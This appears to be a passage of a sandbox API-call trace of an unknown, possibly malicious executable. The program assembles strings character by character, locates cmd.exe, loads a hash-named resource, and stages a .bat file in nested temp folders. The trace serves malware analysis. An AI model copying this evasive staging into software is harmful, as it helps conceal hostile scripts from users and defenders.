0x2a605c0 [0075.593] GetLastError () returned 0x0 [0075.593] SetLastError (dwErrCode=0x0) [0075.593] wcslen (_String="b2") returned 0x2 [0075.593] wcslen (_String="e") returned 0x1 [0075.593] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676a8, Size=0x10) returned 0x2a676d8 [0075.593] GetLastError () returned 0x0 [0075.593] SetLastError (dwErrCode=0x0) [0075.593] GetLastError () returned 0x0 [0075.593] SetLastError (dwErrCode=0x0) [0075.593] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.593] GetLastError () returned 0x0 [0075.593] SetLastError (dwErrCode=0x0) [0075.593] wcslen (_String="b2e") returned 0x3 [0075.593] wcslen (_String="i") returned 0x1 [0075.594] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676d8, Size=0x12) returned 0x2a60500 [0075.594] GetLastError () returned 0x0 [0075.594] SetLastError (dwErrCode=0x0) [0075.594] GetLastError () returned 0x0 [0075.594] SetLastError (dwErrCode=0x0) [0075.594] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.594] GetLastError () returned 0x0 [0075.594] SetLastError (dwErrCode=0x0) [0075.594] wcslen (_String="b2ei") returned 0x4 [0075.594] wcslen (_String="n") returned 0x1 [0075.594] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a60500, Size=0x14) returned 0x2a60500 [0075.594] GetLastError () returned 0x0 [0075.594] SetLastError (dwErrCode=0x0) [0075.594] GetLastError () returned 0x0 [0075.594] SetLastError (dwErrCode=0x0) [0075.594] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.594] GetLastError () returned 0x0 [0075.594] SetLastError (dwErrCode=0x0) [0075.594] wcslen (_String="b2ein") returned 0x5 [0075.595] wcslen (_String="c") returned 0x1 [0075.595] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a60500, Size=0x16) returned 0x2a60500 [0075.595] GetLastError () returned 0x0 [0075.595] SetLastError (dwErrCode=0x0) [0075.595] GetLastError () returned 0x0 [0075.595] SetLastError (dwErrCode=0x0) [0075.595] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.595] GetLastError () returned 0x0 [0075.595] SetLastError (dwErrCode=0x0) [0075.595] wcslen (_String="b2einc") returned 0x6 [0075.595] wcslen (_String="f") returned 0x1 [0075.595] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a60500, Size=0x18) returned 0x2a60500 [0075.595] GetLastError () returned 0x0 [0075.595] SetLastError (dwErrCode=0x0) [0075.595] GetLastError () returned 0x0 [0075.595] SetLastError (dwErrCode=0x0) [0075.595] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.595] GetLastError () returned 0x0 [0075.595] SetLastError (dwErrCode=0x0) [0075.596] wcslen (_String="b2eincf") returned 0x7 [0075.596] wcslen (_String="i") returned 0x1 [0075.596] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a60500, Size=0x1a) returned 0x2a60500 [0075.596] GetLastError () returned 0x0 [0075.596] SetLastError (dwErrCode=0x0) [0075.596] GetLastError () returned 0x0 [0075.596] SetLastError (dwErrCode=0x0) [0075.596] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.596] GetLastError () returned 0x0 [0075.596] SetLastError (dwErrCode=0x0) [0075.596] wcslen (_String="b2eincfi") returned 0x8 [0075.596] wcslen (_String="l") returned 0x1 [0075.596] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a60500, Size=0x1c) returned 0x2a60500 [0075.596] GetLastError () returned 0x0 [0075.596] SetLastError (dwErrCode=0x0) [0075.596] GetLastError () returned 0x0 [0075.596] SetLastError (dwErrCode=0x0) [0075.596] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.596] GetLastError () returned 0x0 [0075.597] SetLastError (dwErrCode=0x0) [0075.597] wcslen (_String="b2eincfil") returned 0x9 [0075.597] wcslen (_String="e") returned 0x1 [0075.597] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a60500, Size=0x1e) returned 0x2a60500 [0075.597] GetLastError () returned 0x0 [0075.597] SetLastError (dwErrCode=0x0) [0075.597] GetLastError () returned 0x0 [0075.597] SetLastError (dwErrCode=0x0) [0075.597] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.597] GetLastError () returned 0x0 [0075.597] SetLastError (dwErrCode=0x0) [0075.597] wcslen (_String="E") returned 0x1 [0075.597] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a67780 [0075.597] GetLastError () returned 0x0 [0075.597] SetLastError (dwErrCode=0x0) [0075.597] GetLastError () returned 0x0 [0075.597] SetLastError (dwErrCode=0x0) [0075.598] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.598] GetLastError () returned 0x0 [0075.598] SetLastError (dwErrCode=0x0) [0075.598] wcslen (_String="E") returned 0x1 [0075.598] wcslen (_String="r") returned 0x1 [0075.598] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67780, Size=0xe) returned 0x2a67750 [0075.598] GetLastError () returned 0x0 [0075.598] SetLastError (dwErrCode=0x0) [0075.598] GetLastError () returned 0x0 [0075.598] SetLastError (dwErrCode=0x0) [0075.598] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.598] GetLastError () returned 0x0 [0075.598] SetLastError (dwErrCode=0x0) [0075.598] wcslen (_String="Er") returned 0x2 [0075.598] wcslen (_String="r") returned 0x1 [0075.598] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67750, Size=0x10) returned 0x2a676c0 [0075.598] GetLastError () returned 0x0 [0075.598] SetLastError (dwErrCode=0x0) [0075.598] GetLastError () returned 0x0 [0075.598] SetLastError (dwErrCode=0x0) [0075.599] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.599] GetLastError () returned 0x0 [0075.599] SetLastError (dwErrCode=0x0) [0075.599] wcslen (_String="Err") returned 0x3 [0075.599] wcslen (_String="o") returned 0x1 [0075.599] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676c0, Size=0x12) returned 0x2a67dd0 [0075.599] GetLastError () returned 0x0 [0075.599] SetLastError (dwErrCode=0x0) [0075.599] GetLastError () returned 0x0 [0075.599] SetLastError (dwErrCode=0x0) [0075.599] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.599] GetLastError () returned 0x0 [0075.600] SetLastError (dwErrCode=0x0) [0075.600] wcslen (_String="Erro") returned 0x4 [0075.600] wcslen (_String="r") returned 0x1 [0075.600] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67dd0, Size=0x14) returned 0x2a68030 [0075.600] GetLastError () returned 0x0 [0075.600] SetLastError (dwErrCode=0x0) [0075.600] GetLastError () returned 0x0 [0075.600] SetLastError (dwErrCode=0x0) [0075.600] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.600] GetLastError () returned 0x0 [0075.600] SetLastError (dwErrCode=0x0) [0075.600] wcslen (_String="e") returned 0x1 [0075.600] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a677c8 [0075.600] GetLastError () returned 0x0 [0075.600] SetLastError (dwErrCode=0x0) [0075.600] GetLastError () returned 0x0 [0075.600] SetLastError (dwErrCode=0x0) [0075.600] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.600] GetLastError () returned 0x0 [0075.601] SetLastError (dwErrCode=0x0) [0075.601] wcslen (_String="e") returned 0x1 [0075.601] wcslen (_String="x") returned 0x1 [0075.601] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677c8, Size=0xe) returned 0x2a67828 [0075.601] GetLastError () returned 0x0 [0075.601] SetLastError (dwErrCode=0x0) [0075.601] GetLastError () returned 0x0 [0075.601] SetLastError (dwErrCode=0x0) [0075.601] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.601] GetLastError () returned 0x0 [0075.601] SetLastError (dwErrCode=0x0) [0075.601] wcslen (_String="ex") returned 0x2 [0075.601] wcslen (_String="t") returned 0x1 [0075.601] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67828, Size=0x10) returned 0x2a67720 [0075.601] GetLastError () returned 0x0 [0075.601] SetLastError (dwErrCode=0x0) [0075.601] GetLastError () returned 0x0 [0075.601] SetLastError (dwErrCode=0x0) [0075.601] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.601] GetLastError () returned 0x0 [0075.601] SetLastError (dwErrCode=0x0) [0075.602] wcslen (_String="ext") returned 0x3 [0075.602] wcslen (_String="d") returned 0x1 [0075.602] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67720, Size=0x12) returned 0x2a67dd0 [0075.602] wcslen (_String="extd") returned 0x4 [0075.602] wcslen (_String=".exe") returned 0x4 [0075.602] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67dd0, Size=0x1a) returned 0x2a60528 [0075.602] wcslen (_String="cmd") returned 0x3 [0075.602] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a677b0 [0075.602] wcslen (_String=".exe") returned 0x4 [0075.602] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x12) returned 0x2a67ff0 [0075.602] GetNativeSystemInfo (in: lpSystemInfo=0x19fee4 | out: lpSystemInfo=0x19fee4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0075.602] GetVersionExW (in: lpVersionInformation=0x19fbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x1e0000, dwMinorVersion=0xea0001eb, dwBuildNumber=0x10, dwPlatformId=0x6a, szCSDVersion="ꦤ\x05") | out: lpVersionInformation=0x19fbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0075.603] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77970000 [0075.603] GetProcAddress (hModule=0x77970000, lpProcName="RtlGetVersion") returned 0x7799fff0 [0075.603] RtlGetVersion (in: lpVersionInformation=0x19fcd4 | out: lpVersionInformation=0x19fcd4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0075.603] GetLastError () returned 0x0 [0075.603] SetLastError (dwErrCode=0x0) [0075.603] GetLastError () returned 0x0 [0075.603] SetLastError (dwErrCode=0x0) [0075.603] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x100a) returned 0x2a68090 [0075.603] GetWindowsDirectoryW (in: lpBuffer=0x2a68090, uSize=0x800 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0075.604] PathAddBackslashW (in: pszPath="C:\\WINDOWS" | out: pszPath="C:\\WINDOWS\\") returned="" [0075.604] GetLastError () returned 0x0 [0075.604] SetLastError (dwErrCode=0x0) [0075.604] wcslen (_String="C:\\WINDOWS\\") returned 0xb [0075.604] wcslen (_String="sysnative") returned 0x9 [0075.604] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68090, Size=0x32) returned 0x2a68090 [0075.604] PathAddBackslashW (in: pszPath="C:\\WINDOWS\\sysnative" | out: pszPath="C:\\WINDOWS\\sysnative\\") returned="" [0075.604] GetLastError () returned 0x0 [0075.604] SetLastError (dwErrCode=0x0) [0075.604] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0075.604] wcslen (_String="cmd") returned 0x3 [0075.604] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a60550 [0075.604] GetLastError () returned 0x0 [0075.604] SetLastError (dwErrCode=0x0) [0075.604] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0075.604] wcslen (_String="cmd") returned 0x3 [0075.604] wcslen (_String=".exe") returned 0x4 [0075.605] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x42) returned 0x2a680d0 [0075.605] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x20) returned 0x2a91088 [0075.605] CreateFileW (lpFileName="C:\\WINDOWS\\sysnative\\cmd" (normalized: "c:\\windows\\sysnative\\cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.605] CreateFileW (lpFileName="C:\\WINDOWS\\sysnative\\cmd.exe" (normalized: "c:\\windows\\sysnative\\cmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0075.607] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a910b0 [0075.607] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.607] CloseHandle (hObject=0x210) returned 1 [0075.608] GetLastError () returned 0x0 [0075.608] SetLastError (dwErrCode=0x0) [0075.608] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0075.608] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a680d0 | out: hHeap=0x2a60000) returned 1 [0075.608] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a677b0 | out: hHeap=0x2a60000) returned 1 [0075.608] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a67ff0 | out: hHeap=0x2a60000) returned 1 [0075.608] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68090 | out: hHeap=0x2a60000) returned 1 [0075.608] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a60550 | out: hHeap=0x2a60000) returned 1 [0075.608] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x34) returned 0x2a60550 [0075.608] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\" " [0075.609] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0075.609] GetLastError () returned 0x0 [0075.609] SetLastError (dwErrCode=0x0) [0075.609] GetLastError () returned 0x0 [0075.609] SetLastError (dwErrCode=0x0) [0075.609] GetLastError () returned 0x0 [0075.609] SetLastError (dwErrCode=0x0) [0075.609] GetLastError () returned 0x0 [0075.609] SetLastError (dwErrCode=0x0) [0075.609] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x9c) returned 0x2a910b0 [0075.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.609] malloc (_Size=0x22) returned 0x1121150 [0075.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=33, lpMultiByteStr=0x1121150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0075.609] free (_Block=0x1121150) [0075.609] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.610] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68090 [0075.610] GetLastError () returned 0x0 [0075.610] SetLastError (dwErrCode=0x0) [0075.610] GetLastError () returned 0x0 [0075.610] SetLastError (dwErrCode=0x0) [0075.610] GetLastError () returned 0x0 [0075.610] SetLastError (dwErrCode=0x0) [0075.610] GetLastError () returned 0x0 [0075.610] SetLastError (dwErrCode=0x0) [0075.610] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x9c) returned 0x2a910b0 [0075.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B5D7C8559F3EFA10E7B554CBD10E295D", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.610] malloc (_Size=0x22) returned 0x1121150 [0075.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B5D7C8559F3EFA10E7B554CBD10E295D", cchWideChar=33, lpMultiByteStr=0x1121150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B5D7C8559F3EFA10E7B554CBD10E295D", lpUsedDefaultChar=0x0) returned 33 [0075.610] free (_Block=0x1121150) [0075.610] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.611] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68090, Size=0x4a) returned 0x2a68090 [0075.611] wcslen (_String="CC1A42CA2429AFFCE2D176556742D0F7") returned 0x20 [0075.611] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68218 [0075.611] FindResourceW (hModule=0x400000, lpName="CC1A42CA2429AFFCE2D176556742D0F7", lpType=0xa) returned 0x859388 [0075.611] LoadResource (hModule=0x400000, hResInfo=0x859388) returned 0xc36ab8 [0075.611] SizeofResource (hModule=0x400000, hResInfo=0x859388) returned 0xe [0075.611] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0xe) returned 0x10e05a8 [0075.611] FreeResource (hResData=0xc36ab8) returned 0 [0075.611] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e05a8) returned 0xe [0075.611] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x200) returned 0x10e05c0 [0075.611] malloc (_Size=0x1bcc) returned 0x11224f0 [0075.611] free (_Block=0x11224f0) [0075.611] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68218 | out: hHeap=0x2a60000) returned 1 [0075.611] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a67720 [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] wcslen (_String=".") returned 0x1 [0075.613] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a677c8 [0075.613] GetLastError () returned 0x0 [0075.613] SetLastError (dwErrCode=0x0) [0075.613] GetLastError () returned 0x0 [0075.613] SetLastError (dwErrCode=0x0) [0075.613] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67720, Size=0xc) returned 0x2a677e0 [0075.613] GetLastError () returned 0x0 [0075.613] SetLastError (dwErrCode=0x0) [0075.613] wcslen (_String=".") returned 0x1 [0075.613] wcslen (_String="b") returned 0x1 [0075.613] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677c8, Size=0xe) returned 0x2a67798 [0075.613] GetLastError () returned 0x0 [0075.613] SetLastError (dwErrCode=0x0) [0075.613] GetLastError () returned 0x0 [0075.613] SetLastError (dwErrCode=0x0) [0075.613] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677e0, Size=0xc) returned 0x2a67768 [0075.613] GetLastError () returned 0x0 [0075.614] SetLastError (dwErrCode=0x0) [0075.614] wcslen (_String=".b") returned 0x2 [0075.614] wcslen (_String="a") returned 0x1 [0075.614] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67798, Size=0x10) returned 0x2a677c8 [0075.614] GetLastError () returned 0x0 [0075.614] SetLastError (dwErrCode=0x0) [0075.614] GetLastError () returned 0x0 [0075.614] SetLastError (dwErrCode=0x0) [0075.614] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67768, Size=0xc) returned 0x2a677f8 [0075.614] GetLastError () returned 0x0 [0075.614] SetLastError (dwErrCode=0x0) [0075.615] wcslen (_String=".ba") returned 0x3 [0075.615] wcslen (_String="t") returned 0x1 [0075.615] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677c8, Size=0x12) returned 0x2a68050 [0075.615] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x400) returned 0x10e07c8 [0075.615] GetLastError () returned 0x0 [0075.615] SetLastError (dwErrCode=0x0) [0075.615] GetLastError () returned 0x0 [0075.615] SetLastError (dwErrCode=0x0) [0075.615] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x2a60608 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0075.615] LoadLibraryW (lpLibFileName="Kernel32.DLL") returned 0x772d0000 [0075.615] GetProcAddress (hModule=0x772d0000, lpProcName="GetLongPathNameW") returned 0x77311710 [0075.615] GetLongPathNameW (in: lpszShortPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpszLongPath=0x2a60608, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0075.617] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.617] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68638 [0075.617] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x10e07c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp")) returned 0x9b7b [0075.683] GetLastError () returned 0x0 [0075.683] SetLastError (dwErrCode=0x0) [0075.683] GetLastError () returned 0x0 [0075.683] SetLastError (dwErrCode=0x0) [0075.683] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x60) returned 0x2a688f0 [0075.683] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp")) returned 1 [0075.684] wcsncpy (in: _Dest=0x19fd08, _Source="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp", _Count=0x104 | out: _Dest="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp" [0075.684] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp") returned 0x2b [0075.684] CreateDirectoryW (lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp"), lpSecurityAttributes=0x0) returned 1 [0075.684] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp", lpPrefixString="", uUnique=0x0, lpTempFileName=0x10e07c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp")) returned 0x9bba [0075.685] GetLastError () returned 0x0 [0075.685] SetLastError (dwErrCode=0x0) [0075.685] GetLastError () returned 0x0 [0075.685] SetLastError (dwErrCode=0x0) [0075.685] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x72) returned 0x2a68958 [0075.685] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp")) returned 1 [0075.686] wcsncpy (in: _Dest=0x19fd08, _Source="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp", _Count=0x104 | out: _Dest="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp" [0075.686] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp") returned 0x34 [0075.686] CreateDirectoryW (lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp"), lpSecurityAttributes=0x0) returned 1 [0075.687] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp", lpPrefixString="", uUnique=0x0, lpTempFileName=0x10e07c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.tmp")) returned 0x9bcb [0075.687] PathAddBackslashW (in: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp" | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\") returned="" [0075.687] GetLastError () returned 0x0 [0075.687] SetLastError (dwErrCode=0x0) [0075.687] GetLastError () returned 0x0 [0075.687] SetLastError (dwErrCode=0x0) [0075.687] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x84) returned 0x2a689d8 [0075.687] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.tmp")) returned 1 [0075.688] PathRenameExtensionW (in: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.tmp", pszExt=".bat" | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 1 [0075.688] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x10e07c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCC.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcc.tmp")) returned 0x9bcc [0075.689] GetLastError () returned 0x0 [0075.689] SetLastError (dwErrCode=0x0) [0075.689] GetLastError () returned 0x0 [0075.689] SetLastError (dwErrCode=0x0) [0075.689] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x84) returned 0x2a68a68 [0075.689] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0075.689] HeapFree (in: 